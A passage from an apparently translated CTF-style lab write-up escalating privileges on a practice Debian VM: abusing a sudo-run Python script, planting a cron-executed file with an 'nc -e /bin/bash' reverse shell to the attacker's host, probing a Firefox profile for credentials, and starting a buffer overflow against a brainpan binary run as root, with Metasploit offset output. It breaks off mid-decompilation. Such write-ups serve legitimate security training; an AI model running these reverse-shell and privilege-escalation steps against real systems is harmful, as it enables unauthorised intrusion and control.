&#039;import os;os.system(&quot;\/bin\/bash&quot;);&#039; &gt; main.py\n(remote) www-data@debian:\/home\/low\/scripts$ sudo -u low  \/usr\/bin\/python3 \/home\/low\/scripts\/script.py\nlow@debian:~\/scripts$ cd ~\nlow@debian:~$ ls -la\ntotal 40\ndrwxr-xr-x 8 low  low  4096 may  7  2021 .\ndrwxr-xr-x 4 root root 4096 may  7  2021 ..\n-rw------- 1 low  low    37 may  7  2021 .bash_history\ndrwx------ 3 low  low  4096 may  7  2021 .gnupg\ndrwxr-xr-x 2 low  low  4096 may  7  2021 images\ndrwxr-xr-x 3 low  low  4096 may  7  2021 .local\ndrwxr-xr-x 2 low  low  4096 may  7  2021 projects\ndrwxr-xr-x 3 low  low  4096 jun 17 08:45 scripts\ndrwxr-xr-x 2 low  low  4096 may  7  2021 temp\n-rw-r--r-- 1 low  low    16 may  7  2021 user.txt\nlow@debian:~$ whoami;id\nlow\nuid=1001(low) gid=1001(low) grupos=1001(low)\nlow@debian:~$ cat user.txt \njustdeserialize\nlow@debian:~$ cd temp\nlow@debian:~\/temp$ ls -la\ntotal 8\ndrwxr-xr-x 2 low low 4096 may  7  2021 .\ndrwxr-xr-x 8 low low 4096 may  7  2021 ..\nlow@debian:~\/temp$ cd ..<\/code><\/pre>\n<h3>Escalating to another user via a cron job<\/h3>\n<p>Continue gathering information:<\/p>\n<pre><code class=\"language-bash\">(remote) low@debian:\/home\/low$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/sbin\/pppd\n\/usr\/bin\/bwrap\n\/usr\/bin\/umount\n\/usr\/bin\/fusermount\n\/usr\/bin\/su\n\/usr\/bin\/chfn\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/passwd\n\/usr\/bin\/sudo\n\/usr\/bin\/pkexec\n\/usr\/bin\/ntfs-3g\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/xorg\/Xorg.wrap\n(remote) low@debian:\/home\/low$ cat .bash_history \n\necho &#039;&#039; &gt; ~\/.bash_history\nexit\nexit\n(remote) low@debian:\/home\/low$ getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/gnome-keyring-daemon = cap_ipc_lock+ep\n\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/lib\/i386-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep\n\/usr\/lib\/x86_64-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep\n(remote) low@debian:\/home\/low$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Es un directorio\ncat: \/etc\/cron.daily: Es un directorio\ncat: \/etc\/cron.hourly: Es un directorio\ncat: \/etc\/cron.monthly: Es un directorio\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n*\/1 *   * * *   debian \/usr\/bin\/python3 \/home\/debian\/Documentos\/backup\/dissapeared.py ; echo &quot;Done&quot; &gt;&gt; \/home\/debian\/Documentos\/log \n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Es un directorio\n(remote) low@debian:\/home\/low$ cat \/home\/debian\/Documentos\/backup\/dissapeared.py\ncat: \/home\/debian\/Documentos\/backup\/dissapeared.py: No existe el fichero o el directorio\n(remote) low@debian:\/home\/low$ cd ..\n(remote) low@debian:\/home$ ls -la\ntotal 16\ndrwxr-xr-x  4 root   root   4096 may  7  2021 .\ndrwxr-xr-x 19 root   root   4096 may  7  2021 ..\ndrwxr-xr-x 15 debian debian 4096 may  8  2021 debian\ndrwxr-xr-x  8 low    low    4096 may  7  2021 low\n(remote) low@debian:\/home$ cd debian\/\n(remote) low@debian:\/home\/debian$ ls -la\ntotal 144\ndrwxr-xr-x 15 debian debian  4096 may  8  2021 .\ndrwxr-xr-x  4 root   root    4096 may  7  2021 ..\n-rw-------  1 debian debian    59 may  7  2021 .bash_history\n-rw-r--r--  1 debian debian   220 may  7  2021 .bash_logout\n-rw-r--r--  1 debian debian  3526 may  7  2021 .bashrc\ndrwxr-xr-x  6 debian debian  4096 may  7  2021 .cache\ndrwxr-xr-x  5 debian debian  4096 may  7  2021 .config\ndrwxr-xr-x  2 debian low     4096 may  8  2021 Descargas\n-rw-r--r--  1 debian debian    35 may  7  2021 .dmrc\ndrwxrwx---  2 debian low     4096 may  7  2021 Documentos\ndrwxr-xr-x  2 debian low     4096 may  7  2021 Escritorio\ndrwx------  3 debian debian  4096 may  7  2021 .gnupg\n-rw-------  1 debian debian   628 may  8  2021 .ICEauthority\ndrwxr-xr-x  2 debian low     4096 may  7  2021 Im\u00e1genes\ndrwxr-xr-x  3 debian debian  4096 may  7  2021 .local\ndrwx------  5 debian debian  4096 may  7  2021 .mozilla\ndrwxr-xr-x  2 debian low     4096 may  7  2021 M\u00fasica\ndrwxr-xr-x  2 debian low     4096 may  7  2021 Plantillas\n-rw-r--r--  1 debian debian   807 may  7  2021 .profile\ndrwxr-xr-x  2 debian low     4096 may  7  2021 P\u00fablico\ndrwxr-xr-x  2 debian low     4096 may  7  2021 V\u00eddeos\n-rw-r--r--  1 debian debian   180 may  7  2021 .wget-hsts\n-rw-------  1 debian debian    51 may  8  2021 .Xauthority\n-rw-r--r--  1 debian debian 17774 may  8  2021 .xfce4-session.verbose-log\n-rw-r--r--  1 debian debian 21283 may  7  2021 .xfce4-session.verbose-log.last\n-rw-------  1 debian debian  2663 may  8  2021 .xsession-errors\n-rw-------  1 debian debian  3491 may  7  2021 .xsession-errors.old\n(remote) low@debian:\/home\/debian\/Documentos$ ls -la\ntotal 12\ndrwxrwx---  2 debian low    4096 may  7  2021 .\ndrwxr-xr-x 15 debian debian 4096 may  8  2021 ..\n-rw-r--r--  1 debian debian  400 jun 17 08:51 log\n(remote) low@debian:\/home\/debian\/Documentos$ head 
log\nDone\nDone\nDone\nDone\nDone\nDone\nDone\nDone\nDone\nDone<\/code><\/pre>\n<p>Documentos is group-writable by our <code>low<\/code> user, so try planting a <code>backup\/dissapeared.py<\/code> there for the cron job to pick up:<\/p>\n<pre><code class=\"language-bash\">(remote) low@debian:\/home\/debian\/Documentos$ mkdir backup\n(remote) low@debian:\/home\/debian\/Documentos$ chmod 777 backup\n(remote) low@debian:\/home\/debian\/Documentos$ cd backup\/\n(remote) low@debian:\/home\/debian\/Documentos\/backup$ echo &quot;import os;os.system(&#039;nc -e \/bin\/bash 192.168.10.107 2345&#039;)&quot; &gt; dissapeared.py\n(remote) low@debian:\/home\/debian\/Documentos\/backup$ chmod +x dissapeared.py<\/code><\/pre>\n<p>The cron job fires once a minute, so just wait for it:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312765.png'><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312765.png\" alt=\"image-20250617145608247\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Buffer overflow to root<\/h3>\n<pre><code class=\"language-bash\">(remote) debian@debian:\/home\/debian$ ls -la\ntotal 144\ndrwxr-xr-x 15 debian debian  4096 may  8  2021 .\ndrwxr-xr-x  4 root   root    4096 may  7  2021 ..\n-rw-------  1 debian debian    59 may  7  2021 .bash_history\n-rw-r--r--  1 debian debian   220 may  7  
2021 .bash_logout\n-rw-r--r--  1 debian debian  3526 may  7  2021 .bashrc\ndrwxr-xr-x  6 debian debian  4096 may  7  2021 .cache\ndrwxr-xr-x  5 debian debian  4096 may  7  2021 .config\ndrwxr-xr-x  2 debian low     4096 may  8  2021 Descargas\n-rw-r--r--  1 debian debian    35 may  7  2021 .dmrc\ndrwxrwx---  3 debian low     4096 jun 17 08:52 Documentos\ndrwxr-xr-x  2 debian low     4096 may  7  2021 Escritorio\ndrwx------  3 debian debian  4096 may  7  2021 .gnupg\n-rw-------  1 debian debian   628 may  8  2021 .ICEauthority\ndrwxr-xr-x  2 debian low     4096 may  7  2021 Im\u00e1genes\ndrwxr-xr-x  3 debian debian  4096 may  7  2021 .local\ndrwx------  5 debian debian  4096 may  7  2021 .mozilla\ndrwxr-xr-x  2 debian low     4096 may  7  2021 M\u00fasica\ndrwxr-xr-x  2 debian low     4096 may  7  2021 Plantillas\n-rw-r--r--  1 debian debian   807 may  7  2021 .profile\ndrwxr-xr-x  2 debian low     4096 may  7  2021 P\u00fablico\ndrwxr-xr-x  2 debian low     4096 may  7  2021 V\u00eddeos\n-rw-r--r--  1 debian debian   180 may  7  2021 .wget-hsts\n-rw-------  1 debian debian    51 may  8  2021 .Xauthority\n-rw-r--r--  1 debian debian 17774 may  8  2021 .xfce4-session.verbose-log\n-rw-r--r--  1 debian debian 21283 may  7  2021 .xfce4-session.verbose-log.last\n-rw-------  1 debian debian  2663 may  8  2021 .xsession-errors\n-rw-------  1 debian debian  3491 may  7  2021 .xsession-errors.old\n(remote) debian@debian:\/home\/debian$ cat .bash_history\n\necho &#039;&#039; &gt; ~\/.bash_history\nexit\nsudo -l\nclear\nsu root\nexit\n(remote) debian@debian:\/home\/debian$ cd .mozilla\n(remote) debian@debian:\/home\/debian\/.mozilla$ ls -la\ntotal 20\ndrwx------  5 debian debian 4096 may  7  2021 .\ndrwxr-xr-x 15 debian debian 4096 may  8  2021 ..\ndrwx------  2 debian debian 4096 may  7  2021 extensions\ndrwx------  6 debian debian 4096 may  7  2021 firefox\ndrwx------  2 debian debian 4096 may  7  2021 
systemextensionsdev<\/code><\/pre>\n<p>There is a Firefox profile, so try extracting the credentials stored in it:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312766.png'><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312766.png\" alt=\"image-20250617145802133\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>Nothing usable there, though. Try a different route:<\/p>\n<pre><code class=\"language-bash\">(remote) debian@debian:\/home\/debian$ sudo -l\nMatching Defaults entries for debian on debian:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser debian may run the following commands on debian:\n    (ALL : root) NOPASSWD: \/bin\/wine \/opt\/Buffer-Overflow-Vulnerable-app\/brainfuck.exe<\/code><\/pre>\n<p>Hmm, I remember this one needing a password earlier? I must be mixing it up with something else.....<\/p>\n<pre><code class=\"language-bash\">(remote) debian@debian:\/home\/debian$ file \/opt\/Buffer-Overflow-Vulnerable-app\/brainfuck.exe\n\/opt\/Buffer-Overflow-Vulnerable-app\/brainfuck.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows<\/code><\/pre>\n<p>Whoa, let's take a look:<\/p>\n<pre><code class=\"language-bash\">(remote) 
debian@debian:\/home\/debian$ cd \/opt\/\n(remote) debian@debian:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x  3 root   root   4096 may  7  2021 .\ndrwxr-xr-x 19 root   root   4096 may  7  2021 ..\ndrwxr-xr-x  6 debian debian 4096 may  7  2021 Buffer-Overflow-Vulnerable-app\n(remote) debian@debian:\/opt$ cd Buffer-Overflow-Vulnerable-app\/\n(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app$ ls -la\ntotal 9240\ndrwxr-xr-x  6 debian debian    4096 may  7  2021 .\ndrwxr-xr-x  3 root   root      4096 may  7  2021 ..\n-rw-r--r--  1 debian debian   21190 may  7  2021 brainfuck.exe\n-rw-r--r--  1 debian debian   21190 may  7  2021 brainpan.exe\n-rw-r--r--  1 debian debian   13312 may  7  2021 dostackbufferoverflowgood.exe\ndrwxr-xr-x  8 debian debian    4096 may  7  2021 .git\ndrwxr-xr-x 54 debian debian    4096 may  7  2021 node_modules\n-rw-r--r--  1 debian debian      60 may  7  2021 NOTE.txt\ndrwxr-xr-x  2 debian debian    4096 may  7  2021 oscp\n-rw-r--r--  1 debian debian   14740 may  7  2021 package-lock.json\n-rw-r--r--  1 debian debian     277 may  7  2021 README.md\n-rw-r--r--  1 debian debian 9266237 may  7  2021 SLMail.exe\n-rw-r--r--  1 debian debian   76152 may  7  2021 vcruntime140.dll\ndrwxr-xr-x  2 debian debian    4096 may  7  2021 vulnserver\n(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app$ cd oscp\n(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app\/oscp$ ls -la\ntotal 84\ndrwxr-xr-x 2 debian debian  4096 may  7  2021 .\ndrwxr-xr-x 6 debian debian  4096 may  7  2021 ..\n-rw-r--r-- 1 debian debian 16601 may  7  2021 essfunc.dll\n-rw-r--r-- 1 debian debian 54648 may  7  2021 oscp.exe<\/code><\/pre>\n<p>Look up what this is (note that brainfuck.exe and brainpan.exe have the same size, 21190 bytes):<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312767.png'><img class=\"lazyload lazyload-style-2\" 
src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312767.png\" alt=\"image-20250617151534432\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>Buffer overflow practice targets... There is also a <code>.git<\/code> directory, so check what it holds:<\/p>\n<pre><code class=\"language-bash\">(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app$ git log\ncommit 38dd2e0ca9878deb70baa35246f0ac93c114acde (HEAD -&gt; main, origin\/main, origin\/HEAD)\nAuthor: Shamsher khan &lt;32321996+shamsherkhan852@users.noreply.github.com&gt;\nDate:   Mon Apr 5 10:56:59 2021 +0530\n\n    Update README.md\n\ncommit 86edb8d75b2cf18ac6f691dd103c1a49f92f8ce7\nAuthor: Shamsher khan &lt;32321996+shamsherkhan852@users.noreply.github.com&gt;\nDate:   Mon Apr 5 10:55:56 2021 +0530\n\n    Add files via upload\n\ncommit cdd6f9b4622cda4e082bfe49dff1a05cfcb42a72\nAuthor: Shamsher khan &lt;32321996+shamsherkhan852@users.noreply.github.com&gt;\nDate:   Mon Apr 5 10:54:24 2021 +0530\n\n    Initial commit\n(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app$ git diff 86edb8d75b2cf18ac6f691dd103c1a49f92f8ce7\ndiff --git a\/README.md b\/README.md\nindex 0d05efa..5f17a8e 100644\n--- a\/README.md\n+++ b\/README.md\n@@ -1 +1,6 @@\n # Tryhackme-BufferOverflow-prep\n+    The SLMail installer.\n+    The brainpan binary.\n+    The dostackbufferoverflowgood binary.\n+    The vulnserver binary.\n+    A custom written &quot;oscp&quot; binary which contains 10 buffer overflows, each with a different EIP offset and set of badchars.\n(remote) 
debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app$ git diff cdd6f9b4622cda4e082bfe49dff1a05cfcb42a72\ndiff --git a\/README.md b\/README.md\nindex ce623ca..5f17a8e 100644\n--- a\/README.md\n+++ b\/README.md\n@@ -1 +1,6 @@\n-# Buffer-Overflow-Vulnerable-app\n\\ No newline at end of file\n+# Tryhackme-BufferOverflow-prep\n+    The SLMail installer.\n+    The brainpan binary.\n+    The dostackbufferoverflowgood binary.\n+    The vulnserver binary.\n+    A custom written &quot;oscp&quot; binary which contains 10 buffer overflows, each with a different EIP offset and set of badchars.\ndiff --git a\/SLMail.exe b\/SLMail.exe\nnew file mode 100644\nindex 0000000..2a0c3a2\nBinary files \/dev\/null and b\/SLMail.exe differ\ndiff --git a\/brainpan.exe b\/brainpan.exe\nnew file mode 100644\nindex 0000000..4c6beb6\nBinary files \/dev\/null and b\/brainpan.exe differ\ndiff --git a\/dostackbufferoverflowgood.exe b\/dostackbufferoverflowgood.exe\nnew file mode 100644\nindex 0000000..043b2d3\nBinary files \/dev\/null and b\/dostackbufferoverflowgood.exe differ\ndiff --git a\/oscp\/essfunc.dll b\/oscp\/essfunc.dll\nnew file mode 100644\nindex 0000000..e2b95db\nBinary files \/dev\/null and b\/oscp\/essfunc.dll differ\ndiff --git a\/oscp\/oscp.exe b\/oscp\/oscp.exe\nnew file mode 100644\nindex 0000000..f49e979\nBinary files \/dev\/null and b\/oscp\/oscp.exe differ\ndiff --git a\/vcruntime140.dll b\/vcruntime140.dll\nnew file mode 100644\nindex 0000000..3fd5a9b\nBinary files \/dev\/null and b\/vcruntime140.dll differ\ndiff --git a\/vulnserver\/essfunc.dll b\/vulnserver\/essfunc.dll\nnew file mode 100644\nindex 0000000..e2b95db\nBinary files \/dev\/null and b\/vulnserver\/essfunc.dll differ\ndiff --git a\/vulnserver\/vulnserver.exe b\/vulnserver\/vulnserver.exe\nnew file mode 
100644<\/code><\/pre>\n<p>This looks like the origin: <code>Tryhackme-BufferOverflow-prep<\/code>. From here the procedure is the familiar one; Tib3rius's cheatsheet is the reference:<\/p>\n<p><a href=\"https:\/\/github.com\/Tib3rius\/Pentest-Cheatsheets\/blob\/master\/exploits\/buffer-overflows.rst\">https:\/\/github.com\/Tib3rius\/Pentest-Cheatsheets\/blob\/master\/exploits\/buffer-overflows.rst<\/a><\/p>\n<p>Try an overflow test:<\/p>\n<h4>Setting up the environment<\/h4>\n<p>Just run it directly:<\/p>\n<pre><code class=\"language-bash\">(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app$ sudo -u root \/bin\/wine \/opt\/Buffer-Overflow-Vulnerable-app\/brainfuck.exe\n[+] initializing winsock...done.\n[+] server socket created.\n[+] bind done on port 9999\n[+] waiting for connections.<\/code><\/pre>\n<p>Scan to check that the service is reachable:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ sudo nmap -sS $IP\n[sudo] password for kali: \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-17 03:44 EDT\nNmap scan report for 192.168.10.102\nHost is up (0.00047s latency).\nNot shown: 996 closed tcp ports (reset)\nPORT     STATE SERVICE\n22\/tcp   open  ssh\n80\/tcp   open  http\n3000\/tcp open  ppp\n9999\/tcp open  abyss\nMAC Address: 08:00:27:32:F2:2A (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 0.59 seconds<\/code><\/pre>\n<h4>Locating the overflow offset<\/h4>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312768.png'><img class=\"lazyload lazyload-style-2\" 
src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312768.png\" alt=\"image-20250617154814077\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>First check whether there is an overflow at all:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312769.png'><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312769.png\" alt=\"image-20250617155329512\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Clearly there is:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312770.png'><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312770.png\" 
alt=\"image-20250617155400111\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Build a cyclic pattern to measure the length that crashes it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ \/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb -l 500 \nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq<\/code><\/pre>\n<p>See where it crashes:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312771.png'><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312771.png\" alt=\"image-20250617155615682\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Surprisingly, 500 bytes did nothing; bump it to 1000:<\/p>\n<pre><code 
class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ \/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb -l 1000\nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312772.png'><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506172312772.png\" alt=\"image-20250617155706273\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>The overflow succeeds; the EIP value 0x35724134 maps to offset 524 in the pattern:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ \/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_offset.rb -q 0x35724134\n[*] Exact match at offset 524<\/code><\/pre>\n<h4>Checking the environment<\/h4>\n<pre><code class=\"language-bash\">(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app$ cat \/proc\/sys\/kernel\/randomize_va_space \n2\n(remote) debian@debian:\/opt\/Buffer-Overflow-Vulnerable-app$ cat NOTE.txt \nYou can use this machine to practice BoF if you get root :D<\/code><\/pre>\n<p><strong>ASLR: 0 = off, 1 = partial (conservative) randomization, 2 = full randomization<\/strong>.......<\/p>\n<p>Pull <code>brainfuck<\/code> down to the local machine and look at it in a decompiler:<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  int v3; \/\/ eax\n  int v4; \/\/ eax\n  int v5; \/\/ eax\n  int v6; \/\/ eax\n  int v7; \/\/ eax\n  int v8; \/\/ eax\n  int v9; \/\/ eax\n  char *Format; \/\/ [esp+0h] [ebp-608h]\n  struct sockaddr addr; \/\/ [esp+30h] [ebp-5D8h]\n  struct sockaddr name; \/\/ [esp+40h] [ebp-5C8h]\n  SOCKET v14; \/\/ [esp+58h] [ebp-5B0h]\n  SOCKET s; \/\/ [esp+5Ch] [ebp-5ACh]\n  struct WSAData WSAData; \/\/ [esp+60h] [ebp-5A8h]\n  int v17; \/\/ [esp+1F8h] [ebp-410h]\n  int v18; \/\/ [esp+1FCh] [ebp-40Ch]\n  int addrlen; \/\/ [esp+200h] [ebp-408h]\n  char *buf; \/\/ [esp+204h] [ebp-404h]\n  char *v21; \/\/ [esp+208h] [ebp-400h]\n  char *Str; \/\/ [esp+20Ch] [ebp-3FCh]\n  char Dst; \/\/ [esp+210h] [ebp-3F8h]\n\n  _alloca((size_t)Format);\n  __main();\n  Str = &quot;_|                            _|                                        \\n&quot;\n        &quot;_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  \\n&quot;\n        &quot;_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _| 
 _|    _|\\n&quot;\n        &quot;_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|\\n&quot;\n        &quot;_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|\\n&quot;\n        &quot;                                            _|                          \\n&quot;\n        &quot;                                            _|\\n&quot;\n        &quot;\\n&quot;\n        &quot;[________________________ WELCOME TO BRAINPAN _________________________]\\n&quot;\n        &quot;                          ENTER THE PASSWORD                              \\n&quot;\n        &quot;\\n&quot;\n        &quot;                          &gt;&gt; &quot;;\n  v21 = &quot;                          ACCESS DENIED\\n&quot;;\n  buf = &quot;                          ACCESS GRANTED\\n&quot;;\n  v18 = 9999;\n  v17 = 1;\n  printf(&quot;[+] initializing winsock...&quot;);\n  if ( WSAStartup(0x202u, &amp;WSAData) )\n  {\n    v3 = WSAGetLastError();\n    printf(&quot;[!] winsock init failed: %d&quot;, v3);\n  }\n  else\n  {\n    printf(&quot;done.\\n&quot;);\n    s = socket(2, 1, 0);\n    if ( s == -1 )\n    {\n      v4 = WSAGetLastError();\n      printf(&quot;[!] could not create socket: %d&quot;, v4);\n    }\n    printf(&quot;[+] server socket created.\\n&quot;);\n    name.sa_family = 2;\n    *(_DWORD *)&amp;name.sa_data[2] = 0;\n    *(_WORD *)name.sa_data = htons(0x270Fu);\n    if ( bind(s, &amp;name, 16) == -1 )\n    {\n      v5 = WSAGetLastError();\n      printf(&quot;[!] 
